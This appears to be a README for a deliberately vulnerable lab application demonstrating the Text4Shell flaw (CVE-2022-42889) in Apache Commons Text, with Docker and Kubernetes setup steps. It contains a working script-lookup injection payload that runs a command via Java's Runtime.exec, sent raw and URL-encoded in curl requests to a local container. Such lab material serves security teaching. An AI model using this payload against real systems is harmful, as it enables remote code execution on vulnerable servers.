You can either build the Docker image locally or pull the image from Docker Hub and run the container.
git clone https://github.com/devenes/text4shell-cve-2022-42889.git
docker build --tag=text4shell .
docker run -d --rm -p 8080:8080 text4shell
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0
curl http://localhost/text4shell/attack?search=<anything>
- Attack can be performed by passing a string
${prefix:name}
where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
- You can also try using
dns
orurl
prefixes
docker container ls
docker exec -it <container_id> bash
- You should see a file named
foo
created in the/tmp
directory:
ls /tmp/
docker container stop <container_id>
cd kubernetes
kind create cluster --config kind-config.yaml
kubectl apply -f deployment.yaml
kubectl apply -f service.yaml
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
kubectl get pods
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash
ls /tmp/ | grep foo
You can find the detailed tutorial on my Udemy course here
References: